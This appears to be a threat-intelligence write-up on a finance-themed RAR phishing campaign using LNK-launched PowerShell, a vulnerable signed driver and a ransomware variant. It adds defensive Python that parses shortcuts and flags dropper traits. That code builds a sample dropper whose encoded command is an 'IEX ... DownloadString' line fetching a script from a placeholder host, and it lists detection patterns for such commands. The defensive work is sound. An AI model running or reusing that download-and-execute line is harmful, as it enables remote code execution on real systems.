SpaceSeals-DOGE.rar (2024-2026)

Summary

Infostealer and ransomware (a modified variant of Fog ransomware), delivered through phishing emails carrying finance-themed ZIP or RAR archives. The archive typically contains malicious shortcut (LNK) files that launch PowerShell scripts to establish persistence and exfiltrate data.

How the Attack Works

Lure: Victims are lured into downloading the RAR file, which often masquerades as internal DOGE documentation or financial files.

Execution: Opening a shortcut inside the archive invokes PowerShell, which sets up persistence and begins collecting and exfiltrating data.

Privilege escalation: The malware uses a "Bring Your Own Vulnerable Driver" (BYOVD) technique. It loads a legitimately signed but vulnerable driver and exploits a known flaw in it, CVE-2015-2291 (the Intel Ethernet diagnostics driver vulnerability abused in other BYOVD campaigns), to gain kernel-level access. Because the driver carries a valid signature, driver signature enforcement alone does not block this step; blocklisting the vulnerable driver does.

Impact: If the goal is disruption rather than theft, the group deploys a customized encryption payload that embeds political commentary and provocations in its code.

Recent Incidents

In early 2025, reports surfaced that a software engineer working for both DOGE and the Federal Emergency Management Agency had a device infected by this or a similar infostealer, leading to the leak of credentials for core government financial systems.
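The LNK-to-PowerShell stage is the part of this chain a defender can triage offline, before anything executes. The following Python is an added example written for this page; it is not code from the campaign, the page's author or any vendor. It parses a .lnk according to the public Shell Link binary format (MS-SHLLINK), pulls out the target path, working directory and arguments, decodes a -EncodedCommand payload, and flags the PowerShell switches droppers rely on (-nop, -w hidden, -ep bypass, -enc) together with the minimized ShowCommand value. The sample shortcut it builds, the example.invalid URL and the stage2.ps1 name are constructed for the demonstration and are not indicators from this campaign.

```python
"""Offline triage of an LNK dropper: parse the shortcut per the public Shell Link
binary format (MS-SHLLINK), recover the PowerShell command line it runs, and flag
the switches droppers rely on. Added example, not the campaign's file or a vendor tool."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046} on disk
# LinkFlags bits that govern which optional structures and StringData fields are present
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value droppers use to keep the console window out of sight

# Checked case-insensitively against the arguments plus any decoded -enc payload
SUSPICIOUS_PATTERNS = [
    (r"-(?:e|ec|en|enc|encodedcommand)\b", "encoded command"),
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(?:nop|noprofile)\b", "profile bypass"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", "network download"),
    (r"\biex\b|invoke-expression", "dynamic evaluation"),
]


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and the StringData fields (target path, working dir, arguments)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76                                  # end of the fixed ShellLinkHeader
    if flags & HAS_ID_LIST:                   # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize includes its own 4 bytes
        off += struct.unpack_from("<I", data, off)[0]
    width = 2 if flags & IS_UNICODE else 1    # UTF-16LE or ANSI, chosen once per file
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters; no terminator follows
        raw = data[off + 2:off + 2 + count * width]
        off += 2 + count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def decode_encoded_command(args: str):
    """Recover the script behind 'powershell -enc <base64 of UTF-16LE>', or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_lnk(data: bytes) -> dict:
    """Parse a shortcut and list the dropper traits it shows (empty list for a plain shortcut)."""
    lnk = parse_lnk(data)
    target = (lnk.get("relative_path", "") + " " + lnk.get("working_dir", "")).lower()
    args = lnk.get("arguments", "")
    decoded = decode_encoded_command(args)
    findings = []
    if "powershell" in target or "pwsh" in target or re.search(r"powershell|pwsh", args, re.I):
        findings.append("launches PowerShell")
    haystack = args + " " + (decoded or "")
    findings += [label for pattern, label in SUSPICIOUS_PATTERNS if re.search(pattern, haystack, re.I)]
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimized on launch")
    return {"fields": lnk, "decoded_command": decoded, "findings": findings}


def build_sample_lnk(relative_path: str, working_dir: str, arguments: str, show_cmd: int) -> bytes:
    """Constructed sample: a minimal but well-formed .lnk in the shape a dropper uses."""
    flags = HAS_ID_LIST | HAS_LINK_INFO | HAS_REL_PATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,  # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)               # timestamps, size, icon, hotkey, reserved
    id_list = struct.pack("<H", 2) + b"\x00\x00"           # IDList holding only the TerminalID
    link_info = struct.pack("<7I", 28, 28, 0, 0, 0, 0, 0)  # empty LinkInfo; only its size matters here

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + id_list + link_info + string_data(relative_path) + string_data(working_dir) + string_data(arguments)


# Constructed stage-2 loader; example.invalid and stage2.ps1 are placeholders, not indicators from this campaign
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_ARGS = "-nop -w hidden -ep bypass -enc " + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LNK = build_sample_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                              r"C:\Users\Public", SAMPLE_ARGS, SW_SHOWMINNOACTIVE)
# Benign shortcut for comparison: ordinary target, plain argument, normal window
BENIGN_LNK = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", r"C:\Users\Public", r"C:\Users\Public\notes.txt", 1)

if __name__ == "__main__":
    for label, blob in (("dropper", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob)["findings"])
```

Against a file pulled from a quarantined archive, call triage_lnk(open(path, "rb").read()). The parser only walks the structures needed to reach StringData; a shortcut whose arguments are empty but whose IDList resolves to a script is not caught by this check, so an empty findings list means "nothing obvious", not "clean".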